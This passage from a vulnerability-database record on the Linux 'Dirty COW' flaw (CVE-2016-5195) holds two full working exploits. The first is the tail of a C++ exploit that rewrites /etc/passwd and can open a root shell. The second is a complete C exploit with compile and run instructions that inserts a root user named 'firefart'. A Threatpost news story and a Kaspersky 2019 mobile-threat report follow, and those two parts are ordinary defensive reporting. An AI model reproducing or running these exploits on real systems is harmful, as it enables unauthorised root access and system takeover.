)\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n \r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n \r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n \r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n }\r\n \r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n \r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26431"}, {"lastseen": "2018-03-28T03:24:54", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/p", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26430", "id": "1337DAY-ID-26430", "sourceData": "// EDB-Note: After getting a shell, doing \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\" may make the system more stable.\r\n//\r\n// This exploit uses the pokemon exploit of the dirtycow vulnerability\r\n// as a base and automatically generates a new passwd line.\r\n// The user will be prompted for the new password when the binary is run.\r\n// The original /etc/passwd file is then backed up to /tmp/passwd.bak\r\n// and overwrites the root account with the generated line.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// To use this exploit modify the user values according to your needs.\r\n// The default is \"firefart\".\r\n//\r\n// Original exploit (dirtycow's ptrace_pokedata \"pokemon\" method):\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// Compile with:\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// Then run the newly create binary by either doing:\r\n// \"./dirty\" or \"./dirty my-new-password\"\r\n//\r\n// Afterwards, you can either \"su firefart\" or \"ssh [email\u00a0protected]\"\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!\r\n// mv /tmp/passwd.bak /etc/passwd\r\n//\r\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\r\n// https://firefart.at\r\n//\r\n \r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n \r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n \r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n \r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n \r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n \r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n \r\nvoid *madviseThread(void *arg) {\r\n int i, c = 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n \r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n \r\n char ch;\r\n FILE *source, *target;\r\n \r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n \r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n \r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n \r\n fclose(source);\r\n fclose(target);\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n \r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n \r\n char *plaintext_pw;\r\n \r\n if (argc >= 2) {\r\n plaintext_pw = argv[1];\r\n printf(\"Please enter the new password: %s\\n\", plaintext_pw);\r\n } else {\r\n plaintext_pw = getpass(\"Please enter the new password: \");\r\n }\r\n \r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n \r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n \r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}\n\n# 0day.today [2018-03-28] #", "sourceHref": "https://0day.today/exploit/26430", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:34", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "A nine-year-old Linux vulnerability that affects most of the major distributions has been recently used in public attacks. The flaw, nicknamed Dirty Cow because it lives in the copy-on-write (COW) feature in Linux, is worrisome because it can give a local attacker root privileges.\n\nWhile the Linux kernel was patched on Wednesday, the major distributions are preparing [patches](<https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>). [Red Hat](<https://bugzilla.redhat.com/show_bug.cgi?id=1384344>), for example, told Threatpost that it has a temporary mitigation available through the kpatch dynamic kernel patching service that customers can receive through their support contact.\n\nDirty Cow is a privilege escalation vulnerability in copy-on-write, [CVE-2016-5195](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>). A race condition exists that allows local users to gain write-access to read-only memory and elevate their privileges to root.\n\nExploits were discovered recently by researcher Phil Oester, who published an informational website on the bug that includes links to [details on the flaw and a proof-of-concept exploit](<http://dirtycow.ninja/>). Oester said the bug has been in the kernel since version 2.6.22, released in 2007.\n\n\u201cThis flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set,\u201d Oester said on his [website](<https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails>).\n\nRed Hat Security Strategist Josh Bressers said the vulnerability is serious but since it is not remotely exploitable, it\u2019s less critical than Heartbleed and other Internet-wide bugs admins have dealt with in the last two-plus years.\n\n\u201cIt\u2019s not on-fire bad like some of the other bugs that have names,\u201d Bressers said. \u201cAn attacker has to have broken in already and then exercise the flaw to gain root. It\u2019s serious, but much less serious because you essentially need two exploits versus just one.\u201d\n\n[Copy-on-write](<http://stackoverflow.com/questions/628938/what-is-copy-on-write>) is a feature used in programming across platforms that manages resources in memory. Multiple processes may share that same page until a user needs to write to it, which is known as marking the page dirty, Bressers said.\n\n\u201cThe problem comes down to the fact that there was a logic error in the Linux kernel that said you could exercise a race condition so that before the kernel separates pages that are marked dirty, it would let you write to the original page,\u201d Bressers said. \u201cAt the same time, another part of the process is writing to it. It allows you to change a file on the disk you shouldn\u2019t be able to change.\u201d\n\nBressers said that attackers would also be limited in virtual machines and containers. For example, they would not be able to escape a virtual machine and attack the host server.\n\n\u201cCurrent exploits don\u2019t work in containers given the way they work,\u201d Bressers said. \u201cIf it could be exploited in the container, the containment technology will keep you in the container. You need something else to get out. So it\u2019s clear, newer technology is useful as a mitigation in this case.\u201d\n", "modified": "2016-10-21T17:40:51", "published": "2016-10-21T11:21:36", "id": "THREATPOST:E5B29B24D99DF66802D64661812BCFB9", "href": "https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/", "type": "threatpost", "title": "Serious Dirty Cow Linux Vulnerability Under Attack", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2020-03-24T11:38:55", "bulletinFamily": "blog", "cvelist": ["CVE-2016-5195"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Figures of the year\n\nIn 2019, Kaspersky mobile products and technologies detected:\n\n * 3,503,952 malicious installation packages.\n * 69,777 new mobile banking Trojans.\n * 68,362 new mobile ransomware Trojans.\n\n## Trends of the year\n\nIn summing up 2019, two trends in particular stick out:\n\n * Attacks on users' personal data became more frequent.\n * Detections of Trojans on the most popular application marketplaces became more frequent.\n\nThis report discusses each in more detail below, with examples and statistics.\n\n### Attacks on personal data: stalkerware\n\nOver the past year, the number of attacks on the personal data of mobile device users increased by half: from 40,386 unique users in 2018 to 67,500 in 2019. This is not about classic spyware or Trojans, but so-called [stalkerware](<https://encyclopedia.kaspersky.com/glossary/stalkerware-spouseware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).\n\n_Number of unique users attacked by stalkerware in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152357/mobile_report_2019_01-en-stalkerware-users.png>)\n\nStalkerware can be divided into two major categories:\n\n * Trackers.\n * Full-fledged tracking apps.\n\nThe creators of trackers generally focus on two main features: tracking victims' coordinates and intercepting text messages. Until recently, many such apps, mostly free, were available on the official Google Play marketplace. After [Google Play changed its policy](<https://play.google.com/about/privacy-security-deception/malicious-behavior/>) in late 2018, most of them were removed from the store, and most developers pulled support for their products. However, such trackers can still be found on their developers' and third-party sites.\n\nIf such an app gets onto a device, messages and data about the user's location become accessible to third parties. These third parties are not necessarily only those tracking the user: the client-server interaction of some services ignores even the minimum security requirements, allowing anyone to gain access to the accumulated data.\n\nThe situation of full-fledged stalkerware is somewhat different: there are no such apps on Google Play, but they are actively supported by developers. These tend to be commercial solutions with extensive spying capabilities. They can harvest almost any data on a compromised device: photos (both entire archives and individual pictures, for example, taken at a certain location), phone calls, texts, location information, screen taps (keylogging), and so on. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152711/mobile_report_2019_stalk_screen.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the capabilities of the software_\n\nMany apps exploit root privileges to extract messaging history from protected storage in social networking and instant messaging applications. If it cannot gain the required access, the stalkerware can take screenshots, log screen taps and even extract the text of incoming and outgoing messages from the windows of popular services using the Accessibility feature. One example is the commercial spyware app Monitor Minor.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152741/mobile_report_2019_stalk_screen_features.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the software's ability to intercept data from social networks and messengers_\n\nThe developers of the [commercial spyware FinSpy](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) went one step further by adding a feature to intercept correspondence in secure messengers, such as Signal, Threema and others. To ensure interception, the app independently obtains root privileges by exploiting the vulnerability CVE-2016-5195, aka \"Dirty Cow\". The expectation is that the victim is using an old device with an outdated operating system kernel in which the exploit can escalate privileges to root.\n\nIt is worth noting that the user base of messaging apps includes hundreds of millions. Classic calls and texts are being used less and less, and communication \u2014 be it text messages or voice/video calls \u2014 is gradually moving to instant messaging applications. Hence the rising interest in data stored in such apps.\n\n### Attacks on personal data: advertising apps\n\nIn 2019, we observed a significant increase in the number of [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) threats, one purpose being to harvest personal data on mobile devices.\n\nThe statistics show that the number of users attacked by adware in 2019 is roughly unchanged from 2018. \n\n_Number of users attacked by adware in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152401/mobile_report_2019_02-en-adware-users.png>)\n\nAt the same time, the number of detected adware installation packages almost doubled from 2018.\n\n_Number of detected adware installation packages in 2018 and 2019._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152406/mobile_report_2019_03-adware-pkg.png>)\n\nThese indicators typically correlate, but not in the case of adware. This can be explained by several factors:\n\n * Adware installation packages are generated automatically and spread literally everywhere, but for some reason do not reach the target audience. It is possible that they get detected immediately after being generated and cannot propagate further. \n * Often, such apps contain nothing useful \u2014 just an adware module; so the victim immediately deletes them, assuming that they allow removing themselves.\n\nNevertheless, it is the second successive year that adware has appeared in our Top 3 detected threats. KSN statistics confirm it to be one of the most common types of threats: four places in our Top 10 mobile threats by number of users attacked in 2019 are reserved for adware-class apps, with one member of the family, HiddenAd, taking the third. \n\n| \u0412\u0435\u0440\u0434\u0438\u043a\u0442 | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 35,83 \n2 | Trojan.AndroidOS.Boogr.gsh | 8,30 \n3 | AdWare.AndroidOS.HiddenAd.et | 4,60 \n4 | AdWare.AndroidOS.Agent.f | 4,05 \n5 | Trojan.AndroidOS.Hiddapp.ch | 3,89 \n6 | DangerousObject.AndroidOS.GenericML | 3,85 \n7 | AdWare.AndroidOS.HiddenAd.fc | 3,73 \n8 | Trojan.AndroidOS.Hiddapp.cr | 2,49 \n9 | AdWare.AndroidOS.MobiDash.ap | 2,42 \n10 | Trojan-Dropper.AndroidOS.Necro.n | 1,84 \n \n_*Share of all users attacked by this type of malware in the total number of users attacked._\n\nIn 2019, mobile adware developers not only generated tens of thousands of packages, but also technically enhanced their products, in particular through the addition of techniques to bypass operating system restrictions. \n\nFor example, Android imposes certain restrictions on background operation of applications for battery-saving reasons. This negatively impacts the operation of various threats, including adware apps that like to lurk in the background and wait for, say, a new banner to arrive from C&amp;C. The introduction of such restrictions made it impossible for apps to show ads outside the context of their own window, thus starving most adware of oxygen.\n\nThe creators of the KeepMusic adware family found a smart workaround. To bypass the restrictions, their software does not request permissions like, for example, malware does. Instead, the program starts looping an MP3 file that plays silence. The operating system decides that the music player is running, and does not terminate the KeepMusic background process. As a result, the adware can request a banner from the server and display it any time. \n\n### Attacks on personal data: exploiting access to Accessibility\n\nThe year 2019 saw the appearance of the first specimen of mobile financial malware (Trojan-Banker.AndroidOS.Gustuff.a), featuring enhanced autonomy. Until then, two methods had been used to steal money from bank accounts: \n\n * **Via SMS banking on the victim end.** This is an autonomous theft technique that requires only information about the transfer recipient. This data the bot can either store in its body or receive as a command from C&amp;C. The Trojan infects the device and sends a text with a transfer request to a special bank phone number. The bank then automatically transfers the funds to the recipient from the device owner's account. Due to the increase in such theft, limits on mobile transfers have been tightened, so this attack vector has been relegated to backup.\n * **By stealing online banking credentials.** This has been the dominant method in recent years. Cybercriminals display a phishing window on the victim's device that mimics the bank's login page and reels in the victim's credentials. In this case, the cybercriminals need to carry out the transaction themselves, using the app on their own mobile device or a browser. It is possible that the bank's anti-fraud systems can detect the abnormal activity and block it, leaving the attackers empty-handed even if the victim's device is infected. \n\nIn 2019, cybercriminals mastered a third method: stealing by manipulating banking apps. First, the victim is persuaded to run the app and sign in, for example, using a fake push notification supposedly from the bank. Tapping the notification does indeed open the banking app, which the attackers, using Accessibility, gain full control over, enabling them to fill out forms, tap buttons, etc. Moreover, the bot operator does not need to do anything, because the malware performs all actions required. Such transactions are trusted by banks, and the maximum transfer amount can exceed the limits of SMS banking by an order of magnitude. As a result, the cybercriminals can clean out the account in one go. \n\nStealing funds from bank accounts is just one malicious use of Accessibility. In effect, any malware with these permissions can control all on-screen processes, while any Android app is basically a visual representation of buttons, data entry forms, information display, and so on. Even if developers implement their own control elements, such as a slider that needs to be moved at a certain speed, this too can be done using Accessibility commands. Thus, cybercriminals have tremendous leeway to create what are perhaps the most dangerous classes of mobile malware: spyware, banking Trojans and ransomware Trojans.\n\nThe misuse of the Accessibility features poses a serious threat to users' personal data. Where previously cybercriminals had to [overlay](<https://encyclopedia.kaspersky.com/glossary/overlaying-overlay-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) phishing windows and request a bunch of permissions in order to steal personal information, now victims themselves output all necessary data to the screen or enter it in forms, where it can be easily gleaned. And if the malware needs more, it can open the Settings section by itself, tap a few buttons, and obtain the necessary permissions. \n\n### Mobile Trojans on popular marketplaces: Google Play\n\nSlipping malware into the main Android app store delivers much better results than social engineering victims into installing apps from third-party sources. In addition, this approach enables attackers to:\n\n * Bypass SafetyNet, Android's built-in antivirus protection. If a user downloads an app from Google Play, the likelihood that it will be installed without additional requests \u2014 for example, to disable the built-in protection under an imaginary pretext \u2014 is very high. The only thing that can protect the user from infection in that situation is a third-party security solution.\n * Overcome psychological barriers. Official app stores enjoy far greater trust than third-party \"markets,\" and act as store windows of sorts that can be used for distributing software much more efficiently.\n * Target victims without unnecessary spending. Google Play can be used to host fakes that visually mimic, say, popular banking apps. This was the distribution vector used in a spate of attacks on mobile users in Brazil: we detected [numerous malicious programs](<https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/>) on Google Play under the guise of mobile apps for Brazilian banks.\n\nIn addition to malicious doppelgangers, cybercriminals deployed several other tricks to maximize device infection rates: \n\n * The [case of CamScanner](<https://securelist.com/dropper-in-google-play/92496/>) showed that an app's legitimate behavior can be supplemented with malicious functions by updating its code for handling advertising. This could be described as the most sophisticated attack vector, since its success depends on a large number of factors, including the user base of the host app, the developer's trust in third-party advertising code and the type of malicious activity. \n * [Another example](<https://securelist.com/mobile-subscriptions/91211/>) demonstrates that attackers sometimes upload to Google Play fairly well-behaved apps from popular user categories. In this case, it was photo editors. \n * The most depressing case involves a Trojan from the Joker family, of which we have found many samples on Google Play, and still are. Deploying the tactic of mass posting, cybercriminals uploaded apps under all kinds of guises: from wallpaper-changing tools and security solutions to popular games. In some cases, the Trojan scored hundreds of thousands of downloads. No other attack vector can reach this kind of audience within such a short space of time.\n\nThe good news is that Google and the antivirus industry have [teamed up](<https://security.googleblog.com/2019/11/the-app-defense-alliance-bringing.html>) to fight threats on the site. This approach should prevent most malware from penetrating the official Google app store.\n\n## Statistics\n\nIn 2019, we discovered 3,503,952 mobile malicious installation packages, which is 1,817,190 less than in the previous year. We have not detected so few mobile threats since 2015.\n\n_Number of mobile malicious installation packages for Android in 2015\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152410/mobile_report_2019_04-total-apk.png>)\n\nFor three consecutive years, we have seen an overall decline in the number of mobile threats distributed as installation packages. The picture largely depends on specific cybercriminal campaigns: some have become less active, others have completely ceased, and new players have yet to gain momentum. \n\nThe situation is similar with the number of attacks using mobile threats: whereas in 2018 we observed a total of **116.5 million** attacks, in 2019 the figure was down to **80 million**.\n\n_Number of attacks defeated by Kaspersky mobile solutions in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152415/mobile_report_2019_05-en-total-attacks.png>)\n\nThe figures were back to the year before, before the start of the Asacub banking Trojan epidemic.\n\nSince the number of attacks correlates with the number of users attacked, we observed a similar picture for this indicator.\n\n_Number of users attacked by mobile malware in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152419/mobile_report_2019_06-en-total-attack-users.png>)\n\n_Geography of attacked users in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152424/mobile_report_2019_07-en-geo-attack-users.png>)\n\n**Top 10 countries by share of users attacked by mobile malware:**\n\nCountry* | %** \n---|--- \nIran | 60.64 \nPakistan | 44.43 \nBangladesh | 43.17 \nAlgeria | 40.20 \nIndia | 37.98 \nIndonesia | 35.12 \nNigeria | 33.16 \nTanzania | 28.51 \nSaudi Arabia | 27.94 \nMalaysia | 27.36 \n \n_*Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile security solutions in the reporting period._ \n_**Unique users attacked in the country as a percentage of all users of Kaspersky mobile security solutions in the country._\n\nIn 2019, Iran (60.64%) again topped the list for the third year in a row. The most common threats in that country come from adware and potentially unwanted software: Trojan.AndroidOS.Hiddapp.bn, AdWare.AndroidOS.Agent.fa, and RiskTool.AndroidOS.Dnotua.yfe.\n\nPakistan (44.43%) climbed from seventh to second place, mainly on the back of a rise in the number of users attacked by adware. The largest contribution was made by members of the AdWare.AndroidOS.HiddenAd family. A similar picture can be seen in Bangladesh (43.17%), whose share has grown due to the same adware families. \n\n### Types of mobile threats\n\n_Distribution of new mobile threats by type in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152430/mobile_report_2019_08-en-threat-types.png>)\n\nIn 2019, the share of RiskTool-class threats decreased by 20 p.p. (32.46%). We believe the main reason to be the sharp drop in the generation of threats from the SMSreg family. A characteristic feature of this family is payments via SMS: for example, money transfers or subscriptions to mobile services. Moreover, the user is not explicitly informed of the payment or money being charged to their mobile account. Whereas in 2018, we picked up 1,970,742 SMSreg installation packages, the number decreased by an order of magnitude to 193,043 in 2019. At the same time, far from declining, the number of packages of other members of this class of threats increased noticeably.\n\n| Name of family | %* \n---|---|--- \n1 | Agent | 27.48 \n2 | SMSreg | 16.89 \n3 | Dnotua | 13.83 \n4 | Wapron | 13.73 \n5 | SmsSend | 9.15 \n6 | Resharer | 4.62 \n7 | SmsPay | 3.55 \n8 | PornVideo | 2.51 \n9 | Robtes | 1.23 \n10 | Yoga | 1.03 \n \n_*Share of packages of this family in the total number of riskware-class packages detected in 2019._\n\nSkymobi and Paccy dropped out of the Top 10 families of potentially unwanted software; the number of installation packages of these families detected in 2019 decreased tenfold. Their creators likely minimized or even ceased their development and distribution. However, a new player appeared: the Resharer family (4.62%), which ranked sixth. This family is noted for its self-propagation through posting information about itself on various sites and mailing it to the victim's contacts.\n\nAdware demonstrated the most impressive growth, up by 14 p.p. The main source of this growth was HiddenAd (26.81%); the number of installation packages of this family increased by two orders of magnitude against 2018. \n\n| Name of family | %* \n---|---|--- \n1 | HiddenAd | 26.81 \n2 | MobiDash | 20.45 \n3 | Ewind | 16.34 \n4 | Agent | 15.27 \n5 | Dnotua | 5.51 \n6 | Kuguo | 1.36 \n7 | Dowgin | 1.28 \n8 | Triada | 1.20 \n9 | Feiad | 1.01 \n10 | Frupi | 0.94 \n \n_*Share of packages of this family in the total number of adware-class packages detected in 2019._\n\nSignificant growth also came from the MobiDash (20.45%) and Ewind (16.34%) families. Meanwhile, the Agent family (15.27%), which held a leading position in 2018, dropped to fourth place.\n\nCompared to 2018, the number of mobile Trojans detected decreased sharply. A downward trend has been observed for two consecutive years now, yet droppers remain one of the most numerous malware classes. The [Hqwar family](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) showed the most notable decrease: down from 141,000 packages in 2018 to 22,000 in 2019. At the same time, 2019 saw the debut of the Ingopack family: we detected 115,654 samples of this dropper. \n\nMeanwhile, the share of Trojan-class threats rose by 6 p.p., with the two most numerous malware families of this class being Boogr and Hiddapp. The Boogr family contains various Trojans that have been detected using machine-learning (ML) technology. A feature of the Hiddapp family is that it hides its icon in the list of installed apps while continuing to run in the background.\n\nThe share of mobile ransomware Trojans slightly increased. The Top 3 families of this class of threats remained the same as in 2018: Svpeng, Congur, and Fusob \u2014 in that order. \n\n### Top 20 mobile malware programs\n\nThe following malware rankings omit potentially unwanted software, such as RiskTool and AdWare.\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 49.15 \n2 | Trojan.AndroidOS.Boogr.gsh | 10.95 \n3 | Trojan.AndroidOS.Hiddapp.ch | 5.19 \n4 | DangerousObject.AndroidOS.GenericML | 5.08 \n5 | Trojan-Dropper.AndroidOS.Necro.n | 3.45 \n6 | Trojan.AndroidOS.Hiddapp.cr | 3.28 \n7 | Trojan-Banker.AndroidOS.Asacub.snt | 2.35 \n8 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.10 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 1.76 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.66 \n11 | Trojan-Downloader.AndroidOS.Helper.a | 1.65 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.60 \n13 | Trojan-Downloader.AndroidOS.Necro.b | 1.59 \n14 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n15 | Exploit.AndroidOS.Lotoor.be | 1.46 \n16 | Trojan.AndroidOS.Hiddapp.cf | 1.35 \n17 | Trojan.AndroidOS.Dvmap.a | 1.33 \n18 | Trojan-Banker.AndroidOS.Agent.ep | 1.31 \n19 | Trojan.AndroidOS.Agent.rt | 1.28 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.14 \n \n_*Share of users attacked by this type of malware out of all attacked users_\n\nAs we wrap up the year 2019, first place in our Top 20 mobile malware, as in previous years, goes to the verdict DangerousObject.Multi.Generic (49.15%), which we use for malware detected with cloud technology. The verdict is applied where the antivirus databases still have no signatures or heuristics for malware detection. This way, the most recent malware is uncovered.\n\nIn second place came the verdict Trojan.AndroidOS.Boogr.gsh (10.95%). This verdict is assigned to files recognized as malicious by our ML-based system. Another result of this system's work is objects with the verdict DangerousObject.AndroidOS.GenericML (5.08%, fourth place in the rating). This verdict is assigned to files whose structure is identical to that of malicious files.\n\nThird, sixth, and sixteenth places were taken by members of the Hiddapp family. We assign this verdict to any app that hides its icon in the list of apps immediately after starting. Subsequent actions of such apps may be anything from downloading or dropping other apps to displaying ads.\n\nFifth and thirteenth places went to members of the Necro family of droppers and loaders. In both threat classes, Necro members did not make it into the Top 10 by number of detected files. Even the weakened Hwar family of droppers strongly outperformed Necro by number of generated objects. That said, users often encountered Necro members due to the family's penetration of Google Play.\n\nSeventh and tenth places went to the Asacub family of banking Trojans. Whereas at the start of the year, the Trojan's operators were still actively spreading the malware, starting in March 2019, we noticed a drop in this family's activity. \n\n_Number of unique users attacked by the Asacub mobile banking Trojan in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152434/mobile_report_2019_09-en-asacub-attacks.png>)\n\nEighth and fourteenth places were reserved for droppers in the Hqwar family. Their activity dropped significantly from 80,000 attacked users in 2018 to 28,000 in 2019. However, we continue to register infection attempts by this family, and 